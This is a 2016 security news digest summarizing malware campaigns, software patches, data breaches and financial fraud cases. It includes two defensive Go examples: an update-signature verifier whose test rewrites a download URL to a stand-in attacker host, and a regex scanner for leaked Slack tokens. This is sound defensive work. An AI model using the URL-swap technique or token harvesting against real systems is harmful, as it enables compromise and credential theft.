Lost door RAT promoted via Facebook and Google’s Blogspot. Security researchers from Trend Micro reported that a remote access trojan (RAT) named Lost Door is customizable and difficult to detect, posing a challenge to information technology (IT) administrators, after researchers found that the trojan leverages a router’s port forwarding feature to reach a server on a private network and disguises its malicious traffic as normal traffic. Attackers can mask their command and control (C&C) addresses and evade network monitoring, as the servers only connect to an internal router Internet Protocol (IP) address.

5/5/16 

New York man pleads guilty to role in ATM skimming scam. A New York man pleaded guilty May 3 to Federal charges for his alleged role in a $709,000 ATM skimming scheme where the man installed skimming devices on ATMs at banks across Rhode Island in order to steal account information from 1,329 victims’ credit cards, and encoded the data onto counterfeit credit cards which were used to make fraudulent purchases. 

9 accused of losing investors $131M in ForceField Energy scheme. The U.S. Attorney’s Office for the Eastern District of New York announced May 3 charges against 9 stock promoters, brokers, and investor relations officials for defrauding investors into purchasing worthless ForceField Energy Inc. stock from December 2009 – April 2015 by secretly trading the stock in undisclosed accounts, inflating trading volume to create a false sense of demand, and concealing kickbacks to stock promoters and brokers, causing investors $131 million in losses. The U.S. Securities and Exchange Commission also filed related civil charges against the defendants.

Attackers exploit critical ImageMagick vulnerability. Two security researchers discovered that a remote code execution (RCE) vulnerability in the open-source software ImageMagick, dubbed “ImageTragick,” was being exploited in the wild. Attackers could exploit the flaw to gain access to the victim’s server by creating an exploit file and giving it an image extension to bypass the security check, which tricks ImageMagick into converting the malicious file and activating the malicious code.

Stored XSS bug affects all bbPress WordPress Forum versions. Automattic released the newest version of its WordPress forum plugin, bbPress 2.5.9, which patched a stored cross-site scripting (XSS) vulnerability after a security researcher from Sucuri found that attackers could use the bbPress user mention (@username) system to store malicious code inside forum posts, allowing skilled attackers to craft malicious code to steal cookies from forum admins and impersonate them with elevated privileges on the WordPress backend.

MosQUito exploit stealing legitimate traffic from WordPress and Joomla Websites. eZanga.com, Inc. published a list revealing that 9,285 Web sites were affected by a malicious campaign dubbed MosQUito, after discovering that hackers were searching for Web sites that load the jQuery JavaScript library and replacing it with a malicious PHP file, jQuery.min.php, to steal paid traffic from legitimate businesses and redirect victims to another Web site controlled by the attacker.

5/4/16 

Google patches 40 vulnerabilities in Android. Google released security updates for its Android operating system (OS) patching 40 vulnerabilities including a remote code execution (RCE) flaw in Mediaserver that could allow an attacker to execute code within the software, and a privilege escalation flaw in the Android debugger that could allow a malicious application to execute arbitrary code in the Android debugger or kernel, among other patched flaws.

Accellion patches flaws found during Facebook hack. The Computer Emergency Response Team (CERT) Coordination Center (CC) released an advisory addressing seven vulnerabilities in the Accellion File Transfer Appliance after a security consultant discovered that one of the flaws, an SQL injection caused by improper handling of data in the “client_id” parameter in “/home/seos/courier/security_key2.api,” could be leveraged to upload a web shell. Other vulnerabilities include three cross-site scripting (XSS) flaws and a number of local privilege escalation issues related to incorrect default permissions.

Millions of credentials exposed by PwnedList flaw. A security researcher discovered a parameter tampering vulnerability in a new PwnedList service called Vendor Security Monitoring which could allow an attacker to add any desired domain through a flaw in the service’s two-step authentication process and submit arbitrary data by tampering with the request. An attacker with an active PwnedList account can exploit the flaw to add the domain of any major company to generate a list of all compromised email accounts. 

Compromised RDP Servers used in corporate ransomware attacks. Researchers from Fox-IT discovered that attackers disseminate ransomware through compromised remote desktop servers by using brute force attacks to infiltrate a remote desktop server connected to the Internet and then using privilege escalation methods to obtain domain administrator privileges. Once an attacker infiltrates a system and gains administrative privileges, they can extract data, recruit the system into a botnet, deliver spam, and demand payment from the compromised company.

5/3/16 

Man in $5M ATM ‘skimming’ ring pleads guilty. A Romanian man pleaded guilty April 29 to Federal charges for his role in a $5 million ATM skimming ring where he and co-conspirators allegedly installed skimming devices on ATMs at banks in New Jersey, New York, Connecticut, and Florida, and transferred the stolen data onto blank ATM cards which were used to withdraw funds from customers’ accounts. Officials stated that a total of 16 people were charged for their involvement and one suspect remains at large. 

Cleveland FBI asks for help identifying ‘breakdown lane bandit.’ FBI officials and local police departments in Cleveland are searching April 29 for a man dubbed the “BDL Bandit” who is suspected of committing three bank robberies in the Cleveland area since March, including a PNC Bank branch, a First Merit Bank branch, and a US Bank branch. Authorities stated that the suspect is armed and believed to have an accomplice. 

Police seeking Garfield bank robber who may be ‘Count Down Bandit.’ Authorities are searching for a man suspected of robbing an M&T Bank branch in Bergen County, New Jersey, April 28. Officials stated that the suspect is believed to be the “Count Down Bandit,” a man allegedly responsible for seven other bank robberies in Bergen and Passaic counties since July 2015. 

‘Baseball Hat Bandit:’ Guaranteed $1,000 reward to identify serial bank robber wearing different caps for slew of capers. Authorities offered a reward April 29 in exchange for information about a man dubbed the “Baseball Hat Bandit,” who is suspected of robbing five banks in King and Pierce counties in Washington.

Serious flaw found in “PL/SQL Developer” update system. Allround Automations released a new version of its PL/SQL Developer product after an application security consultant discovered that version 11.0.4 and earlier versions fetched updates over Hypertext Transfer Protocol (HTTP) and did not validate the authenticity of the downloaded file, allowing a man-in-the-middle (MitM) attacker to replace the authentic Uniform Resource Locator (URL) with one that leads to a malicious file, or to replace the download link with an arbitrary command that executes in the user’s context during the PL/SQL Developer update process.
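The defensive fix for an updater like the one described above is to verify what it downloads, not only where it downloads from. The following is an added example, not Allround Automations' code: the client checks a signed update manifest against a vendor public key pinned in the client, then checks the installer against the hash bound to that manifest, so a URL or hash swapped in transit is rejected. The Manifest format, field names, URLs and installer bytes are assumptions constructed for this example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"crypto/subtle"
	"encoding/hex"
	"encoding/json"
	"errors"
	"fmt"
	"strings"
)

// Manifest is a hypothetical update descriptor: the client fetches this
// first, then the installer it points at. The format and field names are
// assumptions for this example, not the vendor's real update protocol.
type Manifest struct {
	Version string `json:"version"`
	URL     string `json:"url"`
	SHA256  string `json:"sha256"` // hex SHA-256 of the installer bytes
}

// SignedManifest carries the exact bytes that were signed plus the
// vendor's Ed25519 signature over them.
type SignedManifest struct {
	Payload   []byte
	Signature []byte
}

// SignManifest is the vendor-side step: sign the serialized manifest with
// the vendor's private key, which never leaves the build system.
func SignManifest(priv ed25519.PrivateKey, m Manifest) (SignedManifest, error) {
	payload, err := json.Marshal(m)
	if err != nil {
		return SignedManifest{}, err
	}
	return SignedManifest{Payload: payload, Signature: ed25519.Sign(priv, payload)}, nil
}

// VerifyManifest is the client-side step: the public key is pinned in the
// client, so a manifest altered in transit (a swapped URL, a changed hash)
// fails verification before any of its contents are trusted.
func VerifyManifest(pub ed25519.PublicKey, sm SignedManifest) (Manifest, error) {
	if !ed25519.Verify(pub, sm.Payload, sm.Signature) {
		return Manifest{}, errors.New("manifest signature invalid: refusing update")
	}
	var m Manifest
	if err := json.Unmarshal(sm.Payload, &m); err != nil {
		return Manifest{}, err
	}
	// Defense in depth: even a correctly signed manifest must not send the
	// client to a plaintext URL.
	if !strings.HasPrefix(m.URL, "https://") {
		return Manifest{}, fmt.Errorf("manifest URL %q is not https", m.URL)
	}
	if _, err := hex.DecodeString(m.SHA256); err != nil || len(m.SHA256) != 64 {
		return Manifest{}, errors.New("manifest carries a malformed sha256 field")
	}
	return m, nil
}

// VerifyInstaller checks the downloaded installer bytes against the hash
// bound to the verified manifest; a mismatch means the download is not the
// file the vendor signed for and must not be executed.
func VerifyInstaller(m Manifest, installer []byte) error {
	sum := sha256.Sum256(installer)
	got := hex.EncodeToString(sum[:])
	if subtle.ConstantTimeCompare([]byte(got), []byte(m.SHA256)) != 1 {
		return fmt.Errorf("installer hash mismatch: got %s, manifest says %s", got, m.SHA256)
	}
	return nil
}

func main() {
	// Constructed vendor key pair and installer; a real vendor key is
	// generated once and only its public half ships inside the client.
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	installer := []byte("constructed installer bytes")
	sum := sha256.Sum256(installer)
	m := Manifest{Version: "example-version", URL: "https://updates.example.invalid/plsqldev.exe", SHA256: hex.EncodeToString(sum[:])}
	sm, _ := SignManifest(priv, m)

	// Honest path: the manifest verifies and the installer matches its hash.
	verified, err := VerifyManifest(pub, sm)
	fmt.Println("genuine manifest:", err, "installer:", VerifyInstaller(verified, installer))

	// Tampered path: the download URL is rewritten in transit, as in the
	// report above; the pinned-key signature no longer matches.
	tampered := sm
	tampered.Payload = []byte(strings.Replace(string(sm.Payload), "updates.example.invalid", "attacker.invalid", 1))
	_, err = VerifyManifest(pub, tampered)
	fmt.Println("tampered manifest:", err)
}
```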

Microsoft adds Nano server to bug bounty program. Microsoft reported April 29 that it is offering large monetary rewards for vulnerabilities found in the Nano Server installation option of its Windows Server 2016 Technical Preview 5 and all subsequent releases, noting that the product is intended as a compute host for Hyper-V virtual machines, a storage host for Scale-Out File Server, a Domain Name System (DNS) server, and a host for cloud apps, so that a compromise could cause severe damage to each of those components.

Valve fixes steam crypto bug that exposed passwords in plaintext. Valve updated its Steam gaming client after a security researcher found that the lack of Message Authentication Code (MAC) in its application’s crypto package allowed an attacker to carry out man-in-the-middle (MitM) attacks, enabled victims to become Valve Anti-Cheat (VAC) banned, or potentially exposed users’ passwords in plaintext. 

Decrypter for Alpha ransomware lets victims recover files for free. A team of security researchers analyzed a new ransomware called Alpha, which uses AES-256 encryption to lock files, renames each file with the .encrypted extension, adds a ransom note in text format to each folder, changes the target’s wallpaper, deletes itself to avoid detection, and demands that targets pay $400 worth of iTunes gift cards to decrypt the encrypted files. Researchers found a weakness in the ransomware’s encryption routine and released a decrypter to help victims retrieve locked files.

Crooks deliver android malware via Fake Google Chrome updates. Security researchers from Zscaler discovered that cyber criminals were distributing fake Google Chrome update packages disguised as Android application package (APK) files to steal a target’s credit card information, terminate the device’s antivirus software, monitor incoming and outgoing calls and Short Message Service (SMS) messages, and start or end calls, among other actions. Attackers were seen using large collections of domain names to host the malware, which were changed at regular intervals.

BPlug trojan hides in Chrome Extensions and Spams your Facebook friends. Security researchers from Dr. Web discovered that over 12,000 users were infected with the trojan titled Trojan.BPlug.1074, or BPlug, after the malware was seen hiding in Google Chrome extensions and collecting a target’s Facebook user identifier (UID) and cross-site request forgery (CSRF) token to execute actions on the Facebook user’s behalf. Attackers can send out malicious links disguised as YouTube videos to Facebook friends in an effort to spread the trojan.

Malware leverages Windows “God Mode” for persistency. Researchers from Intel Security reported that malware dubbed “Dynamer” was abusing the Microsoft Windows Easter egg known as the “God Mode” folder to gain persistence on an infected machine by installing itself into such a folder inside the %AppData% directory, creating a registry run key, and executing normally. Researchers advised affected users to terminate the malware’s process via Task Manager and run a specially crafted command from the command prompt.

5/2/16 

Slack API credentials left in GitHub repos open new door for corporate hacking. Security researchers from Detectify Labs reported that companies in all industries may be at risk after finding that developers were leaving sensitive credentials inside open-sourced code, following a scan of GitHub projects which revealed that over 1,500 Slack access tokens were available online. The access tokens could allow attackers to access application programming interfaces (APIs) and harvest user data, view Slack channel conversations, group information, and private messages, and automate the use of Slack’s search feature.
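A repository-side check for the problem described above, as an added example that is neither Detectify's nor Slack's code: a scanner that flags Slack-style tokens (prefixes such as xoxb- for bot tokens and xoxp- for user tokens) in the files of a commit and reports them redacted, so the scan output does not become a second copy of the secret. The sample files and the token values in them are constructed placeholders, not real credentials.

```go
package main

import (
	"bufio"
	"fmt"
	"os"
	"regexp"
	"sort"
	"strings"
)

// Finding records where a token-like string was seen. Only a redacted form
// of the token is kept, so findings can be logged or posted to a ticket.
type Finding struct {
	Path     string
	Line     int
	Prefix   string // e.g. "xoxb-": enough to tell the token type
	Redacted string
}

// slackTokenRe matches the Slack token shape: an xox?- prefix followed by
// a body of digits, letters and dashes. The 10-character minimum keeps
// prose that merely mentions "xoxb-" from matching.
var slackTokenRe = regexp.MustCompile(`\bxox[abprs]-[0-9A-Za-z-]{10,}`)

// redact keeps the first 8 and last 4 characters, enough to correlate a
// finding with a token when revoking it in Slack without reproducing it.
func redact(tok string) string {
	if len(tok) <= 12 {
		return strings.Repeat("*", len(tok))
	}
	return tok[:8] + strings.Repeat("*", len(tok)-12) + tok[len(tok)-4:]
}

// ScanText scans one file's contents line by line and returns every match.
func ScanText(path, contents string) []Finding {
	var out []Finding
	sc := bufio.NewScanner(strings.NewReader(contents))
	for n := 1; sc.Scan(); n++ {
		for _, tok := range slackTokenRe.FindAllString(sc.Text(), -1) {
			out = append(out, Finding{Path: path, Line: n, Prefix: tok[:5], Redacted: redact(tok)})
		}
	}
	return out
}

// ScanRepo scans a set of files (path -> contents), for instance the staged
// files of a commit, in path order so results are stable.
func ScanRepo(files map[string]string) []Finding {
	paths := make([]string, 0, len(files))
	for p := range files {
		paths = append(paths, p)
	}
	sort.Strings(paths)
	var out []Finding
	for _, p := range paths {
		out = append(out, ScanText(p, files[p])...)
	}
	return out
}

// sampleRepo is a constructed stand-in for a checked-out repository. The
// token values are placeholders, not real Slack credentials.
var sampleRepo = map[string]string{
	"config.py": "import os\n\n# constructed placeholder, not a real credential\nSLACK_TOKEN = \"xoxb-000000000000-000000000000-EXAMPLEEXAMPLEEXAMPLE\"\n",
	"deploy.sh": "#!/bin/sh\nexport SLACK_API_TOKEN=xoxp-111111111111-222222222222-EXAMPLEEXAMPLEEXAMPLE\ncurl -s https://slack.com/api/auth.test\n",
	"README.md": "Set SLACK_TOKEN to a token beginning with xoxb- before running.\n",
}

func main() {
	findings := ScanRepo(sampleRepo)
	for _, f := range findings {
		fmt.Printf("%s:%d: Slack token (%s) %s\n", f.Path, f.Line, f.Prefix, f.Redacted)
	}
	if len(findings) > 0 {
		// In a pre-commit or CI hook a non-zero exit blocks the commit; the
		// token must also be revoked, since it may already have been pushed.
		fmt.Println("blocking commit: remove the token from the tree and revoke it in Slack")
		os.Exit(1)
	}
}
```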

Google and Mozilla address security issues in Chrome 50 and Firefox 46. Google released its newest web browser, Chrome 50.0.2661.94 which patched nine security flaws including two use-after-free vulnerabilities, one vulnerability in the Blink engine’s V8 bindings, and one vulnerability in the browser’s extensions component, among other patched flaws. 

Microsoft patches Office 365 platform against SAML exploit. Microsoft released a temporary patch for its Security Assertion Markup Language (SAML) Service Provider implementation used for its Office 365 platform after two security researchers found the product had an authentication bypass vulnerability that allowed attackers to authenticate themselves on a service and access users’ data on all shared domains. Microsoft was working to release a permanent patch.

OpenSSL to patch high severity vulnerabilities. The OpenSSL Project reported that it will release OpenSSL versions 1.0.2h and 1.0.1t May 3 to patch several flaws affecting the crypto library as well as flaws rated as high-severity vulnerabilities. 

Pentagon working to ‘take out’ Islamic State’s internet. Pentagon officials reported April 28 that the U.S. military’s Cyber Command (CYBERCOM) was working to destroy the Islamic State’s Internet connection and leave the terrorist group in virtual isolation by interrupting the Islamic State’s command and control (C&C), interrupting the group’s ability to move funds, and interrupting the group’s ability to recruit externally, among other actions. The task will be the command’s first major combat operation in relation to the Islamic State threat.

4/29/16 

Bloods-linked gang members charged with running $414G identity-theft ring. Officials from the New York County District Attorney’s Office announced April 26 that 39 gang members were charged for their roles in a $414,000 identity theft scheme where the group used stolen bank information from the Dark Web to create phony credit cards used to make fraudulent purchases at Barneys and Saks Fifth Avenue stores and sold the goods to fund personal expenses. Officials stated a subsequent search of the suspects’ apartments in Queens and Brooklyn, New York revealed computers and credit card making equipment, among other illicit materials.

Critical, high severity flaws patched in Firefox. Mozilla released its web browser, Firefox 46 that patched a total of 14 vulnerabilities including 4 critical vulnerabilities affecting the browser engine, which could cause crashes and potential arbitrary code execution, as well as a high severity vulnerability that could be exploited via specially crafted Web content and cause an exploitable crash, among other flaws. 

Time for a patch: Six vulns fixed in NTP daemon. Security researchers from Cisco’s Talos Security Intelligence and Research Group discovered five vulnerabilities in the Network Time Protocol daemon (ntpd) after its ongoing ntpd evaluation revealed that attackers could craft User Datagram Protocol (UDP) packets to cause a denial-of-service (DoS) condition or prevent the correct time from being set, among other actions. The vulnerabilities were patched in Network Time Protocol (NTP) version 4.2.8p7.

Cisco finds backdoor installed on 12 million PCs. Cisco’s Talos Security Intelligence and Research Group reported that Tuto4PC’s OneSoftPerDay application was found to install potentially unwanted programs (PUPs) and harvest users’ personal information, and was considered a backdoor on 12 million personal computers (PCs), after an analysis revealed an increase in generic trojans when about 7,00 unique samples displayed names including “Wizz” in some of the domains.

Over 7M Minecraft mobile credentials exposed after Lifeboat data breach. Lifeboat Networks reported April 27 that its network was compromised in January, exposing its users’ login names, passwords, and email addresses in the Minecraft Pocket Edition mobile game, after a security researcher found over 7 million user credentials available online. Lifeboat forced its customers to reset their passwords discreetly and stated it had started using stronger algorithms to guard user data.

Waze drivers can be tracked, network flooded with fake traffic. Six researchers from the University of California, University of Santa Barbara, and Tsinghua University discovered that they could create fake traffic jams and track the movements of any Waze user by reverse engineering the Waze app’s communications protocol and mounting Sybil attacks that insert thousands of fake users into the Waze network. The attacks could manipulate the app’s behavior and allow attackers to pose as Waze users when communicating with the app’s Google server.

Attackers increasingly abuse open source security tools. Security researchers from Kaspersky Lab reported that the open source security tool, Browser Exploitation Framework (BeEF) was being leveraged by an advanced persistent threat (APT) group named NewsBeef to track and steal users’ browsing history from compromised Web sites through flaws in content management systems. In addition, researchers reported that other APT actors were using open source tools in their operations to execute malware across the globe. 

Verizon 2016 DBIR: What you need to know. Verizon released its 2016 Data Breach Investigations Report (DBIR) which revealed current information technology (IT) trends and the overall cyberattack landscape after conducting an analysis on over 100,000 security incidents, which confirmed 2,260 data breaches occurred across 82 different countries in 2015, with the majority of breaches occurring due to human nature via phishing campaigns.

4/28/16 

Feds break up money-laundering scheme linked to fraudulent Armenian passports. The U.S. District Court in Santa Ana unsealed charges the week of April 18 against 7 California residents for their roles in a $14 million identity theft and international money laundering scheme where the group filed approximately 7,000 fraudulent tax returns by using stolen identities to create fraudulent foreign passports from the Republic of Armenia, Georgia, and the Czech Republic in order to open numerous bank accounts and mailboxes, which were used to deposit and launder the refunds. Officials stated that a total of 10 people were involved in the fraud scheme that sought a total of $38 million in fraudulent tax returns. 

DDoS aggression and the evolution of IoT risks. Neustar released its findings after conducting a survey on over 1,000 information technology (IT) professionals across 6 continents which revealed that 76 percent of companies are investing in distributed denial-of-service (DDoS) protection as DDoS attacks are continuing to evolve from single large attacks to multi-vector attacks. Forty-seven percent of attacked organizations were participating in information sharing on threats and counter measures to mitigate future assaults. 

Information stealer “Fareit” abuses PowerShell. Security researchers from Trend Micro discovered a new variant of the Fareit malware was stealing login details, Bitcoin-related data, and other personal information from victims after the malware was delivered via spam emails and executed through two different tactics including Word documents and malicious macros, and PDF documents and Windows PowerShell. Attackers could use PDF files to execute PowerShell via the OpenAction event that allows Fareit to download onto a victim’s machine and collect information. 

The Pirate Bay malvertising campaign pushes Cerber ransomware. Security researchers from Malwarebytes and RiskIQ reported that malicious ads on The Pirate Bay torrent portal were redirecting victims using older Windows and Internet Explorer software to another Uniform Resource Locator (URL), where the Magnitude exploit kit (EK) would leverage a Flash zero-day flaw to compromise vulnerable personal computers (PCs), install the Cerber ransomware, and install potentially unwanted programs (PUPs).

4/27/16 

Miami woman had 371 counterfeit credit cards in luggage, police say. A Miami woman was arrested April 23 at Miami International Airport after authorities noticed suspicious masses in her luggage during a security checkpoint screening, prompting a secondary hand inspection of her suitcase which revealed 371 counterfeit credit cards. A subsequent search revealed two additional fraudulent credit cards in the woman’s wallet. 

Facebook bug allowed attackers to take over accounts on other sites. Facebook patched a flaw in its account registration process after security researchers from Bitdefender discovered the flaw could allow attackers to take over users’ profiles on Web sites where the Facebook Social Login feature was available by adding an attacker’s email address as a secondary address, enabling the attacker to verify the profile and make modifications to the account information. 

Malicious insiders could tap ransomware-as-a-service for profit. Security researchers from Imperva revealed that the ransomware-as-a-service (RaaS) model could be leveraged by malicious insiders to exploit an organization’s unstructured data, locate sensitive data, and encrypt the company’s most valuable information. The researchers found that authors and distributors of the malware use anonymous Bitcoin addresses and the Tor network to ensure they receive their ransom money and stay undetected by law enforcement agencies.

4/26/16 

Compromised credentials still to blame for many data breaches. A Cloud Security Alliance survey found that a lack of scalable identity access management systems, a lack of ongoing automated rotation of cryptographic keys, passwords, and certificates, as well as failure to use multifactor authentication were the major causes of data breaches. The findings also indicated that 22 percent of companies that suffered a data breach attributed the breach to compromised credentials.

Critical flaws in HP Data Protector open servers to remote attacks. Hewlett Packard released security updates for its HP Data Protector software patching six critical vulnerabilities in all versions prior to 7.03_108, 8.15, and 9.06. The flaws could allow remote code execution or unauthorized disclosure of information by unauthenticated users, and the software also shipped with an embedded Secure Sockets Layer (SSL) private key, which could increase the chance of man-in-the-middle (MitM) attacks.

Attackers use PowerShell, Google Docs to deliver “Laziok” trojan. Security researchers from FireEye reported that attackers were able to bypass Google’s security checks and upload a trojan named Laziok to Google Docs with the intention to steal information about the user’s system by loading obfuscated JavaScript code known as “Unicorn,” as well as using “Godmode” and PowerShell to execute the malware. 

Attacker-friendly hosting firm leveraged by Pawn Storm hackers. Security researchers from Trend Micro reported that the Pawn Storm group was abusing a small Virtual Private Server (VPS) provider registered in the United Arab Emirates (UAE) to attack governments in 80 countries including Bulgaria, Greece, Malaysia, Ukraine, and the U.S., and was seen executing more than 100 cyber-attacks within the past year. In addition, it was discovered that the group used the VPS hosting provider for command and control (C&C) servers, exploit sites, spear-phishing campaigns, domestic espionage in Russia, and Web mail phishing sites targeting high-profile users.

4/25/16 

Adobe patches flaw in analytics AppMeasurement for Flash Library. Adobe released its Analytics AppMeasurement for Flash library version 4.0.1, which patched a Document Object Model (DOM)-based cross-site scripting (XSS) vulnerability after a security researcher discovered that the flaw was exposed when the debugTracking feature was enabled. The flaw affects version 4.0 and earlier.

Law enforcement, government agencies see phishing as main cyber risk. The Global Cyber Alliance (GCA), a group of government representatives from the U.S. and the United Kingdom, agreed to promote the usage of Domain-based Message Authentication, Reporting & Conformance (DMARC) protocol to make it more difficult for attackers to tamper with original documents as phishing attacks were ranked as the top cyber threat following research that revealed spear-phishing campaigns increased by 55 percent from 2015. 

DDoS attacks continue to rise in power and sophistication. Imperva released its Global DDoS Threat Landscape Q1 2016 report which revealed that distributed denial of service (DDoS) attacks were more advanced and sophisticated after an analysis revealed that attackers increased the use of browser-like DDoS bots with capabilities of bypassing security challenges by 36.6 percent and attackers were seen executing new ways to perform application layer assaults including Hypertext Transfer Protocol Secure (HTTPS) POST flood.

4/22/16

Man arrested in Tenn. accused of skimming 1,800 credit cards. Officials reported April 20 that a man was arrested and charged with criminal simulation April 7 after police found thousands of pieces of merchandise in the suspect’s vehicle, along with the stolen identities of 150 people, during a traffic stop. Investigators reported that the man stole the credit card data of 1,800 people across several States by secretly installing skimming devices on gas pumps.

“FIN6” cybergang steals millions of cards from PoS systems. FireEye reported that the cybercriminal group dubbed “FIN6,” which has been targeting thousands of retail and hospitality Point-of-Sale (PoS) systems, was increasing its revenue by stealing millions of payment card records and selling them on an underground market, and that the group possessed valid credentials for each target company’s network. Researchers were unsure how the group initially compromised each system due to the lack of forensic evidence.

Cisco patches severe flaws in Wireless LAN controller. Cisco released software updates for its Wireless LAN Controller (WLC) products which patch several critical flaws and high severity denial-of-service (DoS) vulnerabilities, including an issue in the Hypertext Transfer Protocol (HTTP) Uniform Resource Locator (URL) redirection feature of WLC software that can allow an unauthenticated attacker to remotely trigger a buffer overflow and cause affected devices to enter a DoS condition.

New tool aims to generically detect Mac OS X ransomware. A security researcher from Synack developed a tool named “RansomWhere?” that aims to detect and block all types of file-encrypting ransomware on Apple Mac OS X systems by continuously monitoring the file system for the creation of encrypted files by suspicious processes. The tool was developed after researchers received several reports of ransomware targeting Mac OS X users within the past year.

4/21/16 

3 wanted in Gaston Co. skimming case. Gastonia Police reported April 19 that they were searching for 3 suspects believed to be involved in 21 fraud cases after the trio installed skimming devices at Gaston County gas stations and stole customers’ debit card information and personal identification numbers (PINs).

SEC announces financial fraud cases. The U.S. Securities and Exchange Commission (SEC) reported April 19 that Logitech International agreed to pay over $7.5 million in Federal penalties for allegations that the company inflated its 2011 financial records to meet its earning guidance during a 5-year period and that 4 of its executives violated Logitech’s warranty accrual accounting, minimized the write-downs of millions of dollars of excess component parts, and failed to remunerate an earlier acquisition. The SEC also stated that 3 former executives at Ener1, Inc., agreed to pay a total of $180,000 in penalties after the trio overstated revenues and assets in 2010 and overstated assets in the first quarter of 2011. 

New PWOBot Python malware can log keystrokes, mine for bitcoin. Security researchers from Palo Alto Networks discovered a new malware family dubbed PWOBot that is written in Python. PWOBot modules can execute other binaries, launch a Hypertext Transfer Protocol (HTTP) server, log keystrokes, execute custom Python code, query remote Uniform Resource Locators (URLs), and mine for bitcoins using the victim’s central processing unit (CPU) or graphics processing unit (GPU).

Oracle patches 138 bugs, 9 in Java, 31 in MySQL. Oracle released patches addressing 136 security issues, of which 9 were considered critical flaws, in 49 different product suites including Oracle Database, Java, MySQL, Solaris, Berkeley Database, and VirtualBox, among other products. Users were advised to update their software to the latest versions. 

Security firm discovers secret plan to hack numerous websites and forums. Security researchers from SurfWatch Labs reported that they prevented a new trojan named Thanatos from potentially infecting thousands of Invision Power Services (IPS) servers after researchers scanned the Dark Web and discovered attackers were planning to exploit a vulnerability in the infrastructure of IPS by accessing the Web sites of IPS’ customers and adding an exploit kit to each page. IPS was informed of the attackers’ scheme and shut down all its access points.

Kaspersky announces antivirus for Industrial Control Systems (ICS). Kaspersky launched a new cyber-security tool, named Industrial CyberSecurity, which will help Industrial Control Systems/Supervisory Control And Data Acquisition (ICS/SCADA) equipment become more resilient against cyberattacks and will prevent attackers from damaging railway systems, nuclear power plants, oil and gas companies, and various other SCADA equipment by including an “observability mode” which will alert operators of cyberattacks, personnel faults, and anomalies inside an industrial network, among other features.

4/20/16 

Pro-ISIS group defaces 88 websites in three-day rampage. A hacking group called Team System Dz reportedly hacked and defaced 88 Web sites from France, Israel, the U.K., and the U.S. April 14 – April 16, leaving pro-Islamic State messages on each compromised Web page, many of which were running WordPress.

Google analyzes effectiveness of website hack notifications. Google and the University of California, Berkeley released a study revealing that nearly 60 percent of hijacking incidents were resolved by Webmasters over an 11-month period, with about 22 percent of Search Quality Web sites and 6 percent of Safe Browsing Web sites reinfected within 1 month. Google advised Webmasters to sign up for Google’s Search Console to ensure they are notified when their Web sites become compromised.

New CryptXXX ransomware locks your files, steals bitcoin and local passwords. Security researchers from Proofpoint discovered the CryptXXX ransomware had an infostealer component and could harvest information and credentials about a user’s local instant messenger clients, email clients, FTP clients, and Internet browser information, as well as steal bitcoins after finding that the CryptXXX ransomware was similar to an older Reveton ransomware and allegedly created by the authors of the Angler exploit kit (EK). 

Ransomware uses blockchains to transmit decryption keys. Researchers from Sucuri discovered that ransomware developers were using blockchains to deliver decryption keys to victims infected with ransomware, after finding that using blockchains to transmit decryption keys is much more reliable for attackers than using payment gates and compromised third-party Web sites: the entire transaction process is public and transparent while the attackers’ real Internet Protocol (IP) addresses stay hidden.

4/19/16 

Valencia man pleads guilty to fraud in $20 million precious metal investment scam. The U.S. Attorney’s Office charged the owner of Superior Gold Group, LLC., and Superior Equity Group, LLC., April 15 with 4 counts of wire fraud, 5 counts of wire fraud, and 2 counts of money laundering as part of a $20 million metal investment scam after the man defrauded more than 300 investors by failing to disclose material information pertaining to the delivery of precious metals, causing investors to lose nearly $11 million while the man used the investors’ money for personal expenditures from October 2007 – December 2010.

SEC charges litigation marketing company with bilking retirees. The U.S. Securities and Exchange Commission charged Los Angeles-based Prometheus Law and its two co-founders April 15 with conducting a Ponzi-like scheme after the duo raised $11.7 million from about 250 investors and retirees, promising investors that the funds would be allocated for marketing and advertising to locate plaintiffs for class-action lawsuits; instead, the two diverted about $5.6 million for their personal use while failing to deliver the promised 100 to 300 percent returns to investors.

3.2 million devices exposed to ransomware attacks: Cisco. Security researchers from Cisco Talos discovered that approximately 3.2 million computers were vulnerable to file-encrypting ransomware due to out-of-date software after an Internet scan of already compromised devices revealed more than 2,100 backdoors across 1,600 Internet Protocol (IP) addresses associated with governments, schools, aviation companies, and other organizations. Cisco advised administrators to disable external access to infected machines to keep attackers away.

C99 webshell increasingly used in WordPress attacks. IBM Security reported a 45 percent increase in attacks on WordPress Web sites using a variant of the PHP webshell dubbed C99 after IBM identified nearly 1,000 attacks in February and March.

Flaws found in Accuenergy, Ecava ICS products. The Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) released advisories detailing several flaws in ICS products from Accuenergy Corporation, Ecava, and Sierra Wireless Company, including an authentication bypass issue in Acuvim II and Acuvim IIR products, a security issue in Accuenergy devices, and an information disclosure vulnerability in Sierra Wireless’s ACEmanager product, among other vulnerabilities.

New USB-C standard can help fight USB malware. The USB Implementers Forum (USB-IF) reported that it created a new standard titled USB Type-C Authentication that will help protect USB-C capable devices from low-end USB chargers that may damage a user’s device and will help prevent USB malware from infecting a device, as USB-C Authentication only sends data to a device that adheres to the strict USB-C specifications.

Decrypter available for AutoLocky, Locky ransomware copycat. A security researcher from Emsisoft developed a decrypter for a new ransomware named AutoLocky, a variant of the Locky ransomware, which can encrypt a victim’s files by tricking the victim into accessing a malicious link created inside the Start Menu StartUp folder named “Start.Ink.” The decrypter was developed after researchers found a flaw in the ransomware.

Researcher identifies XSS filter bypass in Microsoft Edge. A security researcher from PortSwigger discovered a bypass flaw in Microsoft Edge’s built-in cross-site scripting (XSS) filter that could allow attackers to run malicious JavaScript code inside the Edge Web browser while users browse several Web sites. Microsoft released proof-of-concept code to users and reported that a similar issue was seen in its Internet Explorer Web browser.

VMware patches critical vulnerability. VMware released updates for several of its products including a patch for a critical vulnerability in its Client Integration Plugin (CIP) that could have allowed an attacker to execute a man-in-the-middle (MitM) attack or session hijacking attack by tricking a vSphere Web client user to visit a specially crafted Web site. VMware advised its customers to update all programs to patch the flaw. 

